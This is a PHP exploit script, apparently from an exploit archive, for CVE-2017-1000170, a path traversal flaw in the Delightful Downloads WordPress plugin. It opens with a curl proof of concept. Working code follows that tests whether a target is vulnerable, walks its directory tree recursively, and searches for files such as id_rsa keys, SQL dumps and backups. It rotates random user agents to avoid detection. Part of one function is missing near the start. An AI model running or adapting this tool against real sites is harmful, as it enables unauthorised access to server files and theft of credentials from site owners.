# Exploit Title: WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal # Date: 19/03/2021 # Exploit Author: Nicholas Ferreira # Vendor Homepage: https://github.com/A5hleyRich/delightful-downloads # Version: <=1.6.6 # Tested on: Debian 11 # CVE : CVE-2017-1000170 # PHP version (exploit): 7.3.27 # POC: curl --data "dir=/etc/" http://example.com/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php $data)); #curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080"); //debug w/ burp if($random_agent){ curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($agents)-1)]); } $output = curl_exec($ch); curl_close($ch); return $output; } function parse_dir($str){ // by raina77ow =) $contents = array(); $startFrom = $contentStart = $contentEnd = 0; while (false !== ($contentStart = strpos($str, 'rel="', $startFrom))){ $contentStart += 5; $contentEnd = strpos($str, '">', $contentStart); if (false === $contentEnd){ break; } $contents[] = substr($str, $contentStart, $contentEnd - $contentStart); $startFrom = $contentEnd + 2; } return $contents; } function list_files($url,$path, $recursive=0,$filter){ global $vuln_file; global $recursive; global $random_agent; $exts = ""; $extensions = ""; $files = ""; (count($filter) > 0) ? $has_filter = 1 : $has_filter = 0; $parsed = parse_dir(post_request($url.$vuln_file, $path, $random_agent)); // array tree foreach($parsed as $file_or_folder){ if($has_filter){ foreach($filter as $filtered){ if(strpos($file_or_folder, $filtered) !== false){ //if the current file contains any of the filter echo " ".$file_or_folder."\n"; continue; } if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder if($recursive){ //if recursive flag is set, enter on each folder and do it list_files($url, $file_or_folder, $recursive, $filter); } continue 2; // continue the outermost foreach } } continue; // if has filter, always restart the loop here } if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder if($recursive){ //if recursive flag is set, enter on each folder and do it list_files($url, $file_or_folder, $recursive, $filter); }else{ echo " ".$file_or_folder."\n"; //if it's not to be recursive, just print the folder name } }else{ //is a file echo " ".$file_or_folder."\n"; } continue; } } function alert_user($target,$path, $recursive, $filter){ //scan the root of the server recursivelly can really be a pain if($path == "/" && $recursive == 1){ echo red(" [i] WARNING: Scanning the root of the webserver recursivelly can exceed the timeout limit, block your IP or even take down the server. Are you sure you want to continue? [y/N] "); $handle = fopen ("php://stdin","r"); $line = fgets($handle); if(trim(strtoupper($line)) != 'Y'){ echo "\n Aborted. Try running me without the recursion flag\n\n"; exit; } fclose($handle); echo cyan("\n\n Ok, don't say I didn't warn you...\n"); } list_files($target,$path, $recursive, $filter); } ############################################################ function green($str){ return "\e[92m".$str."\e[0m"; } function red($str){ return "\e[91m".$str."\e[0m"; } function yellow($str){ return "\e[93m".$str."\e[0m"; } function cyan($str){ return "\e[96m".$str."\e[0m"; } function banner(){ echo " _____ _ _ _ _ __ _ _______ | __ \ | (_) | | | | / _| | |__ __| | | | | ___| |_ __ _| |__ | |_| |_ _ _| | | |_ __ ___ ___ | | | |/ _ \ | |/ _` | _ \| __| _| | | | | | | ยด__/ _ \/ _ \ | |__| | __/ | | (_| | | | | |_| | | |_| | | | | | | __/ __/ |_____/ \___|_|_|\__, |_| |_|\__|_| \__,_|_| |_|_| \___|\___| __/ | ".green("Coder: ").yellow("Nicholas Ferreira")." |___/ 0x7359 ".cyan("Delightful Downloads - Jquery File Tree")." Unauthenticated Path Traversal exploit ". red("\n (CVE-2017-1000170)")." "; } // ======================= CHECKING ======================= $short_args = "u:h::p:r::f:a::"; $long_args = array("url:","help::","path:","recursive::","filter:","random-agent::"); $options = getopt($short_args, $long_args); if($argc == 1){ die(banner()." Usage: php xpl_jqueryFileTree.php -u url [-x extensions] [-p path] [-r] [-h] [-a]\n\n Help: -h or --help\n\n"); } if(isset($options['h']) || isset($options['help'])){ banner(); die( " Usage: php ".$argv[0]." -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a] -h, --help: Show this message -u, --url: URL of target -a, --random-agent: Use random user agents -f, --filter: Name of files or extensions to search for (separated by comma) -p, --path: The full path from which the filenames will be read (default: /) -r, --recursive: Generates the tree recursivelly (be careful) e.g.: ".cyan($argv[0]." -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r")." | \-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths (You must provide the dot to indicate it's an extension) ".cyan($argv[0]." -u victim.com -f .log,id_rsa -a -r")." | \-> This will search for all files named \"id_rsa\" or having the extension \".log\" within all folders of the server, with random user-agents ".yellow("Tip: use \"php ..... | tee output\" to save the result to an output file")." "); } $random_agent = 0; if(isset($options['a'])){ $random_agent = 1; }elseif(isset($options['random-agent'])){ $random_agent = 1; } $target = ""; if(isset($options['u'])){ $target = $options['u']; }elseif(isset($options['url'])){ $target = $options['url']; } $recursive = 0; if(isset($options['r'])){ $recursive = 1; }elseif(isset($options['recursive'])){ $recursive = 1; } $path = "/"; if(isset($options['p'])){ $path = $options['p']; }elseif(isset($options['path'])){ $path = $options['p']; } if($path !== "/"){ if(!preg_match("#^\/.*\/$#", $path)){ $path = str_replace("//", "/", "/".$path."/"); // $path must be of the form // for this to work, so lets force it } } $extensions = ""; if(isset($options['f'])){ $extensions = $options['f']; //strings }elseif(isset($options['filter'])){ $extensions = $options['filter']; //string } $filter = array(); if($extensions !== ""){ $filter = explode(",", $extensions); } // ========================= END CHECKING ========================== function is_vulnerable($url){ global $vuln_file; global $random_agent; global $filter; echo " [*] Target: ".$url."\n"; if(count($filter) > 0){ echo " [*] Filter: ".implode(", ", $filter)."\n\n"; } echo cyan(" [i] Checking if the target is vulnerable...\n"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url.$vuln_file); curl_setopt($ch, CURLOPT_NOBODY, true); // HEAD request to vulnerable file curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if(substr($code,0,1) == 2){ // 2xx echo yellow(" [i] HTTP response of vulnerable file is 2xx. May be vulnerable!\n"); $post = post_request($url.$vuln_file, "/", $random_agent); if(preg_match_all("/jqueryfiletree.*(bin|boot|dev|etc|var|usr|windows|users|temp)/", strtolower($post))){ echo green(" [+] Target is vulnerable! Getting file list...\n\n"); return true; } echo red(" [-] Target is not vulnerable... =(\n\n"); }else{ echo red(" [-] Could not find a valid vulnerable file. Maybe it doesn't exist, you don't have permission to read it or it is in another directory.\n"); } return false; } banner(); if(is_vulnerable($target)){ global $filter; alert_user($target,$path, $recursive, $filter); echo green("\n [+] Done!\n\n"); } ?>